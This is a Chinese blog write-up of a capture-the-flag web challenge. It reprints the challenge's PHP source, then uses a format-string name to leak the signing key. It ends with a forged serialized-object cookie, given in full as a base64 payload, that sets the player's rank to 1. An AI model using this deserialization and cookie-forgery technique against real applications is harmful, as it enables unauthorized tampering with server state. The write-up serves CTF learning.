2020 HGAME WEB_Week3 [序列之争]

最新推荐文章于 2023-02-06 01:45:12 发布
最新推荐文章于 2023-02-06 01:45:12 发布
阅读量959 收藏
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43305301/article/details/104222441
版权

后面wp篇幅有些长,分开写了。

序列之争

涉及内容
PHP反序列化漏洞
PHP格式化字符串漏洞
代码审计

打开页面发现是一个刀剑神域的小游戏,输入姓名可以开始。
(果然打CTF的都是死肥宅)
初始界面
先随便输个姓名,进入游戏界面。
游戏页面
还有个人信息一栏:
个人信息
随便尝试了一下这个小游戏,表面上的逻辑很简单,打怪即可获取经验,然后排名会上升,但是上升到第2名就无论如何都不会上升了,显然需要一些其他手段来提升到第1名。看看页面源码,尝试找找线索。
发现注释提示
源码提示
拉到本地,发现是题目源码。贴出来如下:
cardinal.php

//cardinal.php
<?php
error_reporting(0);
session_start();

class Game
{   
    private $encryptKey = 'SUPER_SECRET_KEY_YOU_WILL_NEVER_KNOW';
    public $welcomeMsg = '%s, Welcome to Ordinal Scale!';

    private $sign = '';
    public $rank;

    public function __construct($playerName){
        $_SESSION['player'] = $playerName;          //为session创建player
        if(!isset($_SESSION['exp'])){
            $_SESSION['exp'] = 0;                   //设定初始经验
        }
        $data = [$playerName, $this->encryptKey];   
        $this->init($data);
        $this->monster = new Monster($this->sign);
        $this->rank = new Rank();
    }

    private function init($data){
        foreach($data as $key => $value){
            $this->welcomeMsg = sprintf($this->welcomeMsg, $value);     //欢迎信息
            $this->sign .= md5($this->sign . $value);
        }
    }
}

class Rank
{
    private $rank;
    private $serverKey;     // 服务器的 Key
    private $key = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx';

    public function __construct(){
        if(!isset($_SESSION['rank'])){
            $this->Set(rand(2, 1000));          //如果不存在就随机设定rand
            return;
        }

        $this->Set($_SESSION['rank']);          //存在的话就设定session里的rank
    }

    public function Set($no){
        $this->rank = $no;                      //rank的赋值函数
    }

    public function Get(){
        return $this->rank;                     //获取rank值
    }

    public function Fight($monster){
        if($monster['no'] >= $this->rank){
            $this->rank -= rand(5, 15);         //赢了则前进随机5-15名
            if($this->rank <= 2){
                $this->rank = 2;                //第二名则不前进
            }

            $_SESSION['exp'] += rand(20, 200);  //随机加经验
            return array(
                'result' => true, 
                'msg' => '<span style="color:green;">Congratulations! You win! </span>'
            );
        }else{
            return array(
                'result' => false, 
                'msg' => '<span style="color:red;">You die!</span>'
            );
        }
    }

//     public function __destruct(){
//         // 确保程序是跑在服务器上的!
//         $this->serverKey = $_SERVER['key'];
//         if($this->key === $this->serverKey){
//             $_SESSION['rank'] = $this->rank;
//         }else{
//             // 非正常访问
//             session_start();
//             session_destroy();
//             setcookie('monster', '');
//             header('Location: index.php');
//             exit;
//         }
//     }
}

class Monster
{
    private $monsterData;
    private $encryptKey;

    public function __construct($key){
        $this->encryptKey = $key;                   
        if(!isset($_COOKIE['monster'])){            //如果不存在怪兽就新set一个
            $this->Set();
            return;
        }

        $monsterData = base64_decode($_COOKIE['monster']);         //对cookie进行base64解码
        if(strlen($monsterData) > 32){ 
            $sign = substr($monsterData, -32);                      //sign是后32位
            $monsterData = substr($monsterData, 0, strlen($monsterData) - 32);      
            echo "<br/>".$sign."<br/>".$monsterData."<br/>".md5($monsterData . $this->encryptKey);
            if(md5($monsterData . $this->encryptKey) === $sign){
                $this->monsterData = unserialize($monsterData);                 //逆序列化怪兽信息数组
            }else{
                session_start();
                session_destroy();
                setcookie('monster', '');
                header('Location: index.php');
                exit;
            }
        }
        
        $this->Set();     
    }

    public function Set(){
        $monsterName = ['无名小怪', 'BOSS: The Kernal Cosmos', '小怪: Big Eggplant', 'BOSS: The Mole King', 'BOSS: Zero Zone Witch'];
        $this->monsterData = array(
            'name' => $monsterName[array_rand($monsterName, 1)],            //随机生成小怪
            'no' => rand(1, 2000),
        );
        $this->Save();
    }

    public function Get(){
        return $this->monsterData;                      //获取怪兽信息
    }

    private function Save(){
        $sign = md5(serialize($this->monsterData) . $this->encryptKey);
        setcookie('monster', base64_encode(serialize($this->monsterData) . $sign)); 
    }
}

game.php

<!-- game.php -->
<?php
    error_reporting(0);
    include_once('cardinal.php');
    if(isset($_SESSION['player'])){
        $playerName = $_SESSION['player'];
    }else{
        $playerName = $_POST['player'] ?? '';
        if($playerName === '' || is_array($playerName)){
            header('Location: index.php');
            exit;
        }
    }

    $game = new Game($playerName);
?>
<html lang="en"><head>
    <meta charset="utf-8">
    <title>Ordinal Scale · 序列之争</title>
    <!-- Bootstrap core CSS -->
    <link href="/static/bootstrap.min.css" rel="stylesheet"></link>

    <style>
      .bd-placeholder-img {
        font-size: 1.125rem;
        text-anchor: middle;
        -webkit-user-select: none;
        -moz-user-select: none;
        -ms-user-select: none;
        user-select: none;
      }

      @media (min-width: 768px) {
        .bd-placeholder-img-lg {
          font-size: 3.5rem;
        }
      }
    </style>
    <link href="/static/cover.css" rel="stylesheet">
  </head>
  <body class="text-center" style="background-image:url('/static/bg.jpg')">
    <div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
  <header class="masthead mb-auto">
    <div class="inner">
      <h3 class="masthead-brand">Ordinal Scale</h3>
      <nav class="nav nav-masthead justify-content-center">
        <span class="nav-link active"><b>当前排名: <?php echo($game->rank->Get());?></b></span>
        <span class="nav-link active">经验: <?php echo($_SESSION['exp']);?></span>
        <a class="nav-link" href="#">登出</a>
      </nav>
    </div>
  </header>

  <main role="main" class="inner cover">
    <h2 class="cover-heading"><?php echo($game->welcomeMsg);?></h2>
    <h1># <?php echo($game->rank->Get());?></h1>
    <?php if($game->rank->Get() === 1){?>
        <h2>hgame{flag_is_here}</h2>
    <?php }?>
    <br>
    <div class="card" style="color: #007bff;">
        <h2 class="card-header"><?php echo($game->monster->Get()['name']);?></h2>
        <div class="card-body">
            <h5 class="card-title">等级: <?php echo($game->monster->Get()['no']);?></h5>
            <h5>
            <?php if(isset($_POST['battle'])){
                $fight = $game->rank->Fight($game->monster->Get());
                echo($fight['msg']);

                if(!$fight['result']){
                    $_SESSION['player'] = NULL;
                }
            }
                $game->monster->Set();
            ?>
            </h5>
            <form method="POST" action="">
                <input type="hidden" name="battle" value="1"></input>
                <br><br>
                <?php if(isset($_POST['battle']) && !$fight['result']){?>
                    <button class="btn">退出</button>
                <?php }else{?>
                    <button class="btn btn-primary">挑战!</button>
                <?php } ?>
            </form>
        </div>
    </div>

  </main>

 <?php include_once('template/footer.php');?>

(里面有些注释是我看的时候顺便加的,不是原本就有,还有一个检查是否在服务器上运行的模块,被我注释掉了)
代码很长,具体的请自行分析,我这里只简单总结一下:
$Game->rank->Get()返回值等于1时,输出Flag,但是发现源码中有这个限制:

if($this->rank <= 2){$this->rank = 2;}

通过游戏并不可能达到1。
另外发现存在一个反序列化的点:

if(md5($monsterData . $this->encryptKey) === $sign){
	$this->monsterData = unserialize($monsterData);}

显然是通过这个反序列化的点,通过对象注入覆盖原本的值,使rank等于1。
至于这个$monsterData的值,是从cookie中得到的,源码中也给出了cookie的构造,所以cookie也就是payload的注入点。
详细可以见我另一篇博客的0x01部分。[传送门]
但是还有前面的if条件必须想办法解决,要么绕过,要么必须想办法得到$encryptKey。又发现可疑的点:

private function init($data){
        foreach($data as $key => $value){
            $this->welcomeMsg = sprintf($this->welcomeMsg, $value);     
            $this->sign .= md5($this->sign . $value);                   
        }
    }

$data里面存在$encryptKey的值,但是是这个数组里的第二组值,而第一次%s被输入的名字置换以后,第二组键值不会被再抛出。解决办法很简单,如果名字含有%s,那么第二组键值也会被置换在欢迎信息中,从而得到$encryptKey
名字写上shabi%s,页面输出:
页面输出
得到加密用的key为gkUFUa7GfPQui3DGUTHX6XIUS3ZAmClL
第一个问题解决了,接下来先计算个人签名。鉴于源码已经给了,就不用费力分析签名是怎么来的了,直接改一下源码在本地运行:

//计算个人签名
class Game
{
    private $encryptKey = 'gkUFUa7GfPQui3DGUTHX6XIUS3ZAmClL';	//替换成得到的Key
    public $welcomeMsg = '%s, Welcome to Ordinal Scale!';
    
    private $sign = '';
    public $rank;
    
    public function __construct($playerName){
        
        $data = [$playerName, $this->encryptKey];
        $this->init($data);
        $this->monster = new Monster($this->sign);
        $this->rank = new Rank();
    }
    
    private function init($data){
        foreach($data as $key => $value){
            $this->welcomeMsg = sprintf($this->welcomeMsg, $value);     //欢迎信息
            $this->sign .= md5($this->sign . $value);
        }
        echo $this->sign;		//自己加的一句  输出签名
    }
}
$new = new Game('shabi');

得到个人签名:414c7ad55625f289003613764448a05573b610f5c306a5e8129542d1b4789cdf
接下来就是计算cookie了。
根据源码中的计算方法,构造代码:

<?php
$seria = 'O:4:"Game":5:{S:16:"\00Game\00encryptKey";s:32:"gkUFUa7GfPQui3DGUTHX6XIUS3ZAmClL";s:10:"welcomeMsg";s:32:"shabi, Welcome to Ordinal Scale!";S:10:"\00Game\00sign";s:64:"414c7ad55625f289003613764448a05573b610f5c306a5e8129542d1b4789cdf";s:4:"rank";O:4:"Rank":3:{S:10:"\00Rank\00rank";i:1;}s:7:"monster";O:7:"Monster":2:{S:20:"\00Monster\00monsterData";a:2:{s:4:"name";s:7:"bigboss";s:2:"no";i:1;}S:19:"\00Monster\00encryptKey";s:64:"414c7ad55625f289003613764448a05573b610f5c306a5e8129542d1b4789cdf";}}';
$encryptKey = "414c7ad55625f289003613764448a05573b610f5c306a5e8129542d1b4789cdf";
$sign = md5($seria.$encryptKey);
$cookie = base64_encode($seria. $sign);
var_dump($GLOBALS);

至于序列化字符串,这里完全不需要自己构造,修改一下源码,在本地让它自行生成即可。将其中Rank改为1:O:4:"Rank":3:{S:10:"\00Rank\00rank";i:1;}
得到payload:

Tzo0OiJHYW1lIjo1OntTOjE2OiJcMDBHYW1lXDAwZW5jcnlwdEtleSI7czozMjoiZ2tVRlVhN0dmUFF1aTNER1VUSFg2WElVUzNaQW1DbEwiO3M6MTA6IndlbGNvbWVNc2ciO3M6MzI6InNoYWJpLCBXZWxjb21lIHRvIE9yZGluYWwgU2NhbGUhIjtTOjEwOiJcMDBHYW1lXDAwc2lnbiI7czo2NDoiNDE0YzdhZDU1NjI1ZjI4OTAwMzYxMzc2NDQ0OGEwNTU3M2I2MTBmNWMzMDZhNWU4MTI5NTQyZDFiNDc4OWNkZiI7czo0OiJyYW5rIjtPOjQ6IlJhbmsiOjM6e1M6MTA6IlwwMFJhbmtcMDByYW5rIjtpOjE7fXM6NzoibW9uc3RlciI7Tzo3OiJNb25zdGVyIjoyOntTOjIwOiJcMDBNb25zdGVyXDAwbW9uc3RlckRhdGEiO2E6Mjp7czo0OiJuYW1lIjtzOjc6ImJpZ2Jvc3MiO3M6Mjoibm8iO2k6MTt9UzoxOToiXDAwTW9uc3RlclwwMGVuY3J5cHRLZXkiO3M6NjQ6IjQxNGM3YWQ1NTYyNWYyODkwMDM2MTM3NjQ0NDhhMDU1NzNiNjEwZjVjMzA2YTVlODEyOTU0MmQxYjQ3ODljZGYiO319OTE3YWVhZjkxNGM2M2YwMTYzYWE3ZTM0NTg1ZTMwYzI=

回到游戏页面,把cookie改成我们计算出的值:
cookie
重新挑战,得到发现自己是第一了 (^ - ^)
第一名
最后要不是出题人自己说我都没发现这题还有彩蛋,页面右上角的登出键点击后无法登出,完全符合刀剑原著,点个赞,老二次元了~

(个人整理,如有错误欢迎指正)

kaleido76
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
HGAME 2020 web week3 writeup
stepone4ward的博客
02-07 845
序列之争-ordinal scale 首先source.zip获得源码,得知需要让rank为1即可获得flag 先找一下有没有反序列化的点,在monster类的构造函数中找到了unserialize方法 再找一下哪里可以让rank值变为1,在Rank类的析构函数中找到了让$_SESSION['rank']变为1的地方 如果我们可以满足$this->key === $this->serv...
hgame2023 week3 writeup
02-03 1564
hgame2023 week3
HGAME2020第一周WEB小白视角解题
qq_44060093的博客
02-13 1128
Cosmos 的博客 看题目没啥有用的信息 打开网页之后发现了版本管理工具以及GitHub字样,盲猜跟github源码泄露类似 先实试了试/.git无果,又试了试/.git/config出来了github的地址 直接访问地址 点击init找到了存放flag的地方 flag是base64加密过的,解密即可 hgame{g1t_le@k_1s_danger0us_!!!} 接 头 霸 王 ...
hgame week3 kmusic(z3)
最新发布
qq_54894802的博客
02-06 169
比较特别的z3求解,简单的.net逆向
Hgame-Week3
qq_53086690的博客
03-03 617
目录WebLazyDogR4UPost to zuckonit200OK!!Liki的生日礼物 Web LazyDogR4U 地址:http://718a753f92.lazy.r4u.top 提示:懒狗R4u把Flag藏起来了,但由于他是懒狗,所以flag藏的很不安全。 进入页面之后是登录页面,用子域名爆破工具进行爆破。发现有www.zip. 下载之后分析源代码。发现有flag.php。分析代码得出 $_SESSION[‘username’] === 'admin’就会得到flag。 然后再lazy页
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
HGAME cdcollector-开源
04-24
【标题】"HGAME cdcollector-开源"是一个针对游戏收藏管理者的开源项目,它扩展了原有的cdcollector系统,特别设计用于管理和记录大量的电子游戏数据,尤其是HGAME(可能指的是成人向游戏)的数据库。这个系统利用...
hgame:Haskell 游戏引擎
05-30
【Hgame:Haskell游戏引擎】是一个开源项目,旨在利用Haskell这门纯函数式编程语言来构建高效、灵活的游戏开发框架。Haskell以其强大的类型系统、 lazy evaluation(惰性求值)特性以及对并行和并发的良好支持,为...
0hgame:用0h制作的游戏->阅读README
05-01
)2- DO NOT TOUCH BLACK THINGS IF YOU DONT WANT TO START AGAIN3- Try to reach the other side of the window to became the king of the penguins4- Enjoy it. (it is a rule, so if you are not enjoying the ...
3D模型图片查看器(可查看3D程序模型)
11-03
在游戏领域,尤其是Hgame(成人游戏)中,3D模型的创建和展示是至关重要的,因为它们构成了游戏内的角色和环境。 描述中提到的“Hgame图片模型查看工具”表明这个查看器可能专门针对游戏行业内,特别是成人游戏的3D...
hgame-week3-web-wp
www_xuhss_com的博客
02-12 279
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 hgame第三周(web ak) 1.SecurityCenter 先看看hint(**vendor是第三方库和插件放置的文件夹,一般来源于composer的安装) 找到了使用的twig模板,应该是twig模板注入 查博客 依葫芦画瓢http://146.56.223.
HGAME2020 Week4 Writeup
wh201906的博客
02-14 1316
完结撒花 Crypto - ToyCipher_Linear 题目: Why encryption based on XOR and Rotation is easy to break? 还有加解密的脚本: #!/usr/bin/env python3 # -*- coding: utf-8 -*- import os, binascii from secret import flag d...
HGAME2020第一周杂项题——欢迎参加HGame
qq_44060093的博客
01-29 1046
看题可知是base64编码,在线网站解密: https://base64.supfree.net/ 建议将空格改成/ 在在线网站在线解密莫尔斯 http://www.atool9.com/morse.php
2020 HGAME WEB_Week3[cosmos的留言板-2](基于时间的盲注)
Kaleido76的博客
02-10 504
一道SQL盲注题目[cosmos的留言板]
HGAME 2020 web week2 writeup
stepone4ward的博客
02-04 1097
不要当懒狗
hgame2021 week3 pwn刷题
qq_45595732的博客
02-21 401
blackgive 栈迁移 from pwn import* context.log_level = 'debug' def pr(a,addr): log.success(a+'====>'+hex(addr)) #p = process('./blackgive') p =remote('182.92.108.71',30459) elf = ELF('./blackgive') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') puts_plt =
SSM+BOOTSTRAP+MYSQL代码(一)
AnticsBeast的博客
06-15 142
<!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <meta content="width=device-width, initial-scale=1, shrink-to-fit=no" name="viewport"> <meta content="" name="description"> <meta content.
hgame2020-week2-re
令则
02-10 1401
hgame week2 hgame ctf week2的逆向wp 题目链接: 链接: https://pan.baidu.com/s/1mmUxYJ-bfh-hf2akSiMRCA 密码: um92 文章目录hgame week2unpackcrackmebaby pybaby pycpython字节码pythonu unpack 这是一个elf脱壳的题目,我用的方法是先运行程序,然后使用gd...
HGAME2020 Final Writeup
wh201906的博客
03-08 720
居然能苟进决赛 绝了 Misc - Good Video 题目: Need a video to fresh your mind? 终于又见到misc了 先binwalk扫了一遍压缩包和视频文件,得到了一大堆东西。。。。。 (居然还有vmdk?) 查了一下头部的EBML文件格式,发现这是一种面向未来的音视频框架,而且之后的Matroska也是一种封装格式 这些文件格式为了支持未来出现的新压...
堆溢出漏洞利用: EldenRingFinal 中的_hgame2024_off_by_one攻击
本周四的hgame2024官方题解涉及一个Pwn挑战,题目是关于利用堆溢出漏洞实现任意写入并泄露libc库的内存地址,进而获取shell。出题思路主要围绕以下几个关键步骤: 1. **漏洞利用原理**: 题目利用的是off_by_one...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值